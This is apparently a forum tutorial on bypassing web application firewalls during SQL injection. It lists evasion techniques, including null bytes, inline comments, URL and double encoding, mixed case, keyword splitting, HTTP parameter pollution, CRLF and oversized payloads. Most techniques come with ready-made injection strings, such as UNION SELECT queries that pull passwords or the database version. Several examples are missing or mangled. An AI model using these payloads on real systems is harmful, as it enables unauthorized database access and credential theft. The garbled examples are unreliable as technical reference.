incogbyte #:
HI, People In this basic tutorial, I want to show you a little bit of SQL Injection WAF bypass, I know it is a subject that is well commented and discussed every day .. after all, WAFS are boring :/ and in the end .. they just work as a superficial protection for an environment (in my opnion it is like a leaky bucket that you fix with bubble gum) .. So without further waiting .. here are some manual WAF bypass techniques. If you want more about it, leave a Tweet @incogbyte ;)
SQL injection attacks common uses some SQL keywords such as:
- Nullbyte bypass:
To perform a nullbyte attack, you simply need to supply a URL encoded nullbyte %00 prior to any char that the filter is blocking, example
'UNION SELECT password FROM Users WHERE username-'pewpew'--
Using the the Nullbyte technique to bypass will be
%00' UNION SELECT password FROM Users WHERE username-'pewpew'--
- SQL comments
You can use sql inline comments sequences to create snippets of SQL, using this technique you can bypass various filters, example:
- Inline MySQL DB attacking string above, could be re-written like bellow:
obs: MySQL needs a whitespace after comment such as space, tab, newline etc.
- URL encoding:
URL encoding is a versatile technique that you can use to bypass many kinds of filter, the most basic form. Only replace the char that you need with ASCII code in hexadecimal preceded by % character
EX: single quote ( ‘ ) 0x27 the representation %27
/ URL encoded to %2f
- URL encoded to %2a
Note: Sometime this technique will not work, so you can bypass with Double URL-encode. In the double-encoded attac, the % character in the original attack is itself URL-enced in the normal way (as %25) s0 that double URL-encoded form of single quotation mark is %2527. Example:
After that double-URL-encoding will be decode the input.
- Changing Cases
Some WAFS don’t have any rule or signatures to detect upper cases. Example:
uNiOn ALl sElEcT
SeLecT UsEr FrOm DuAL UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --
- Encode to Hex Forbidden:
We do that with: /%2A%2A/ and %2F**%2F,2,3,4,5 --**%2Funion%2F**%2Fselect%2F**%2F1,2,3,4,5,6 --
- Replacing keywords
These technique, we have to know the waf filters.. Example:
the WAF will filter those keys and the UNI and ON and SEL and ECT form one word again.
- WAF Bypassing - using characters
Characters like
| ? " ' * % [] ; \ $ () £ ¢
By using theses chars in lots of cases /$/ is not filtered, but the sign * is replaced with something (space most of cases). ex:*on+sel*ect+1,3,4,5--+-
It’s like splitting but, in this case ONLY * is filtered out by WAF
- HTTP Parameter Pollution (HPP)
HTTP parameter pollution is a web technique evasion that allows an attacker to craft a HTTP request, repeating all parameters of request
Regular attack SQLi union select 1,2 --
HPP attack + SQLi:*/union/*&id=*/select/*&id=*/1,2+--+
- CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspx asp) applications
Putting theses chars at the beggining of payload
- Buffer Overflow bypassing
Majority of WAFS are written with low level langagues like C. A bufferoverflow occurs when a program or process tries to store more data in a buffer (temporary storage data) than it was intended to hold.
and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)
this AAAAA it’s more than 8000 :P
+and+(/*50000select*/1) = (/*!32302select*/0xAAAAAAAAAAAAAAAAAAAAAAAAAA.....)+
In URL:'+and(/*60000select*/1)-(/*!3200select*/0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+and 0 union select 1, version(), 3,4,5,6,7,8,9 --+
- Author: inc0gbyt3